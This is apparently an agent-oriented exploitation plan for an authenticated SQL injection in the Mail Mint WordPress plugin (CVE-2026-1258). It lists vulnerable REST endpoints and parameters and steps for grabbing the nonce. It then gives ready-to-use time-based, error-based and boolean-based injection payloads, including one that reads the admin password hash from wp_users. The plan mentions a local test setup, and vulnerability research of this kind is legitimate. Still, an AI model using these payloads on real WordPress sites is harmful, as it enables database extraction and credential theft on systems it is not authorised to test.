Exploitation Research Plan: CVE-2026-1258 (Mail Mint SQL Injection)

1. Vulnerability Summary

The Mail Mint plugin (up to version 1.19.2) contains multiple authenticated SQL injection vulnerabilities. These exist in the REST API controllers handling forms, automations, email templates, and TutorLMS contact imports. The root cause is the direct interpolation of user-supplied parameters—specifically order-by, order-type, and selectedCourses—into SQL queries without using $wpdb->prepare() or strictly whitelisting the values. While the vulnerability requires Administrator privileges, it allows for full database extraction via blind or error-based techniques.

2. Attack Vector Analysis

• Endpoints:
  • /wp-json/mail-mint/v1/forms (GET/POST)
  • /wp-json/mail-mint/v1/automation (GET/POST)
  • /wp-json/mail-mint/v1/email/templates (GET/POST)
  • /wp-json/mail-mint/v1/contacts/import/tutorlms/map (POST)
• Vulnerable Parameters: order-by, order-type, selectedCourses.
• Authentication: Required. Administrator role or higher (Administrator+).
• Preconditions: The REST API must be active (default in WordPress), and the Mail Mint plugin must be active.
• Payload Type: Blind Time-based or Boolean-based SQL Injection (standard for ORDER BY and IN clause injections).

3. Code Flow (Inferred)

1. Entry Point: A REST request is made to register_rest_route endpoints defined in the plugin's REST initialization (likely in includes/Rest/ or similar).
2. Controller: The request is handled by a class like Mail_Mint\Rest\Forms_Controller or Mail_Mint\Rest\Automation_Controller.
3. Parameter Retrieval: The controller retrieves parameters using $request->get_param('order-by').
4. SQL Sink: The parameters are passed to a data-fetching method (e.g., get_items or a repository class). The code constructs a query string:
   $query = "SELECT * FROM {$wpdb->prefix}mail_mint_forms ORDER BY " . $order_by . " " . $order_type;
5. Execution: $wpdb->get_results( $query ) is called without $wpdb->prepare().

4. Nonce Acquisition Strategy

REST API endpoints in WordPress require a _wpnonce parameter or an X-WP-Nonce header for authenticated sessions to prevent CSRF.

1. Login: Log in as an Administrator.
2. Navigation: Use browser_navigate to go to the Mail Mint dashboard: /wp-admin/admin.php?page=mail-mint.
3. Extraction: The WordPress core provides a REST nonce for authenticated users.
   • JavaScript Variable: wpApiSettings.nonce
   • Action: browser_eval("window.wpApiSettings.nonce")
4. Alternative: If wpApiSettings is not available, check for plugin-specific localized variables:
   • Check for mail_mint_vars or mail_mint_admin_vars.
   • browser_eval("window.mail_mint_vars?.nonce") (inferred).

5. Exploitation Strategy

We will focus on the forms endpoint as it is the most common feature. We will use a time-based blind injection in the order-by parameter.

Step-by-Step Exploit:

1. Identify Base Response Time: Measure a normal request to /wp-json/mail-mint/v1/forms.
2. Craft Time-Based Payload:
   • order-by injections often require a subquery or a CASE statement if the database is MySQL.
   • Payload: (SELECT 1 FROM (SELECT(SLEEP(5)))a)
3. Execute Request:
   • Tool: http_request
   • Method: GET
   • URL: /wp-json/mail-mint/v1/forms?order-by=(SELECT 1 FROM (SELECT(SLEEP(5)))a)&order-type=ASC
   • Headers:
     • X-WP-Nonce: [EXTRACTED_NONCE]
     • Cookie: [ADMIN_COOKIES]

Payload for selectedCourses (TutorLMS endpoint):

This parameter is likely used in an IN clause.

• Payload: 1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1=1
• URL: /wp-json/mail-mint/v1/contacts/import/tutorlms/map
• Body: selectedCourses=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1=1

6. Test Data Setup

1. Install Plugin: Install and activate mail-mint version 1.19.2.
2. Create Content:
   • Create at least one "Form" in the Mail Mint menu to ensure the forms query returns data.
   • Path: Mail Mint -> Forms -> Create New.
3. Admin User: Ensure an admin user exists (default: admin / password).

7. Expected Results

• Vulnerable Response: The HTTP response for the malicious request will be delayed by approximately 5 seconds.
• Success Indicator: The response body should still return valid JSON forms data (as the ORDER BY modification is syntactically valid but time-consuming).
• Normal Response: A request with order-by=id should return in < 500ms.

8. Verification Steps

After the exploit, use wp-cli to verify the database structure and confirm the injection point:

1. Check Plugin Version: wp plugin get mail-mint --field=version (Confirming <= 1.19.2).
2. Manual Query Test:

   wp db query "SELECT id FROM wp_mail_mint_forms ORDER BY (SELECT 1 FROM (SELECT SLEEP(2))a)"
   

   If this command hangs for 2 seconds, the SQL construction is confirmed.

9. Alternative Approaches

• Error-Based: If WP_DEBUG is on, use updatexml() or extractvalue() to leak the version:
  • order-by=updatexml(1,concat(0x7e,@@version),1)
• Boolean-Based: If timing is inconsistent, use IF to change the order:
  • order-by=IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE id=1),1,1))=36, id, title)
  • This will sort the results differently depending on if the admin password hash starts with $ (ASCII 36).